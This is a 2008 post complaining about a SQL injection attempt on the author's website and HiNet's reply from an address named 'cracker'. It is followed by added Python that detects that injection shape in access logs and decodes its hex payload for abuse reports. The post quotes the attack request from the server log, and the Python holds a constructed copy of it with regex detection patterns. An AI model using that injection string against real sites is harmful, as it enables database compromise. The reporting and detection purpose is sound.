
Infiltration of ISP providers by crackers.

So ...(sigh) what do you do when you complain to a given ISP provider about
a case of attempted abuse by one of their IP addresses and you get a
response from someone in the "security team" whose email name is "cracker"?

Apparently some (or many) of these crackers own (with their consent or not)
even their ISP providers --or worse, some (or many) ISP providers may be
crackers themselves!

A portion of my original complaint to the ISP --where I list one of the
attempted abuse records by the cracker for informational purposes:

from: myself <my_email_address>
to: network-adm hinet net, network-center hinet net
date: Mon, Aug 25, 2008 at 11:37 PM
subject: Abuse by user at IP address
mailed-by: my_domain

On August 25, 2008, from 08:52:10  am to 08:52:28 am (America/Tijuana time),
user at IP address abused <my> web site with the below
referenced offending code (relevant web server log section is attached and
named as abuse-118_167_20_180.txt). - - [25/Aug/2008:08:52:10 -0700] "GET
xenserver-4-1-and-32-bit-and-64-bit-virt?blog=4';DECLARE%20 S
%20CHAR(4000);SET%20 S=CAST(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%20AS%20CHAR(4000));EXEC(@S);
HTTP/1.1" 400 567 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
Foxy/1; Foxy/1; .NET CLR 1.1.4322)"


I would appreciate your cooperation in stopping this sort of cracker.

Thank you in advance for your prompt attention to this issue.

---------------End of portion of email

Below is an interesting section of one of the replies:


Return-Path: <my_email_address>
Received: from localhost (localhost [])
        by dns.adsl.hinet.net (8.12.3/8.12.3/Debian-6.6) with ESMTP id
        for <cracker localhost>; Tue, 26 Aug 2008 18:06:31 +0800

----------End of unformatted

The above was attached to the formatted email reply below:


from: cracker hinet net
to: <my_email_address>
date: Tue, Aug 26, 2008 at 4:24 AM
subject: [HiNetSOC/Craker : 1219749049]HiNet Notification(HiNet 通知)
mailed-by: lcss.hinet.net

Dear Sir:

Thank you for your email. Please kindly provide us more detailed information
about the bad behavior, at least including the attackers' IP address, time
(GMT, Greenwich Mean Time) and evidence for further processing.

Yours sincerely,

HiNet Security Operation Center
Chunghwa Telecom Co., Ltd.
Taipei, Taiwan, R.O.C.
Email: cracker hinet net


------End of formatted email

No wonder spam and intrusion attempts never end.

Jose R R

IBM Lotus Symphony <http://symphony.lotus.com> is officially supported on RH
and SuSE; official Ubuntu support coming at the end of August 2008.
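As an added example (not code from the post or from HiNet), the following Python scans web server log lines for the DECLARE / CAST(0x...) / EXEC(@var) injection shape shown in the complaint, converts the log's -0700 timestamp to GMT as HiNet's reply asks, and decodes the hex literal that the CAST() hides, producing the IP / time / evidence record an abuse desk wants. The log lines, IP addresses and the hex payload are constructed.

```python
import re
from datetime import datetime, timezone
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" format (not from the post); the
# hex literal inside CAST() is a constructed placeholder: the hex of "SELECT 1".
SAMPLE_LOG = """\
192.0.2.10 - - [25/Aug/2008:08:51:59 -0700] "GET /blog/?id=4 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Aug/2008:08:52:10 -0700] "GET /blog?blog=4';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x53454C4543542031%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 400 567 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
"""

# Client IP, bracketed timestamp, quoted request line and status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')
# The DECLARE @var / CAST(0x.. AS CHAR) / EXEC(@var) shape from the post, matched on
# the URL-decoded request so %20 and %27 encodings cannot hide it.
INJECTION_RE = re.compile(r"(?i)\bdeclare\s+@\w+\s+n?(?:var)?char\s*\(|\bcast\s*\(\s*0x[0-9a-f]+\s+as\s+n?(?:var)?char\b|\bexec\s*\(\s*@\w+\s*\)")
HEX_LITERAL_RE = re.compile(r"(?i)cast\s*\(\s*0x([0-9a-f]+)")


def parse_line(line):
    """Return the fields an abuse desk asks for, or None for an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")  # %z reads "-0700"
    return {"ip": m["ip"], "time_utc": ts.astimezone(timezone.utc),
            "request": unquote(m["req"]), "status": int(m["status"])}


def decode_cast_hex(request):
    """Decode the hex literal hidden in CAST(0x... AS CHAR) into readable text."""
    m = HEX_LITERAL_RE.search(request)
    return bytes.fromhex(m.group(1)).decode("utf-8", "replace") if m else None


def build_abuse_records(log_text):
    """One record per injection attempt: IP, time in GMT, decoded payload, raw evidence."""
    records = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not INJECTION_RE.search(rec["request"]):
            continue
        records.append({"ip": rec["ip"],
                        "time_gmt": rec["time_utc"].strftime("%Y-%m-%d %H:%M:%S GMT"),
                        "decoded_payload": decode_cast_hex(rec["request"]),
                        "evidence": line})
    return records
```

Feed a real access log through build_abuse_records() and the resulting records carry exactly the three items HiNet asked for: attacker IP, time in GMT and the raw log line as evidence.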
